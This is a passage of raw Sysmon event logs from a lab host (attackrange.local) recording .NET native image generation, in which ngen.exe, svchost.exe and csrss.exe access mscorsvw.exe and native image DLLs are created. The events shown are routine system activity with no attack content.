indows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:02.434{59A5CD1D-91CE-6005-2603-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c50-0\System.Configuration.Install.dll2021-01-18 13:49:02.434 10341000x80000000000000007434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:02.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CE-6005-2603-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:02.262{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91CE-6005-2603-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:02.262{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CE-6005-2603-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:02.090{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CE-6005-2503-00000000A301}4836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:02.074{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91CE-6005-2503-00000000A301}4836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:02.074{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CE-6005-2503-00000000A301}4836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:02.028{59A5CD1D-91CD-6005-2403-00000000A301}4040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\fc8-0\CustomMarshalers.dll2021-01-18 13:49:02.028 10341000x80000000000000007445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:03.793{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CF-6005-2903-00000000A301}4712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:03.793{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91CF-6005-2903-00000000A301}4712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:03.793{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CF-6005-2903-00000000A301}4712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:03.684{59A5CD1D-91CE-6005-2803-00000000A301}5016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1398-0\System.Xaml.dll2021-01-18 13:49:03.684 10341000x80000000000000007448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:04.090{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D0-6005-2A03-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:04.074{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91D0-6005-2A03-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:04.074{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D0-6005-2A03-00000000A301}2592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:06.777{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D2-6005-2E03-00000000A301}4992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:06.762{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91D2-6005-2E03-00000000A301}4992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:06.762{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D2-6005-2E03-00000000A301}4992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:06.668{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D2-6005-2D03-00000000A301}3432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:06.652{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91D2-6005-2D03-00000000A301}3432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:06.652{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D2-6005-2D03-00000000A301}3432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:06.590{59A5CD1D-91D2-6005-2C03-00000000A301}1156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\484-0\System.Net.Http.dll2021-01-18 13:49:06.590 10341000x80000000000000007455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:06.324{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91D2-6005-2C03-00000000A301}1156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:06.309{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91D2-6005-2C03-00000000A301}1156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:06.309{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91D2-6005-2C03-00000000A301}1156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 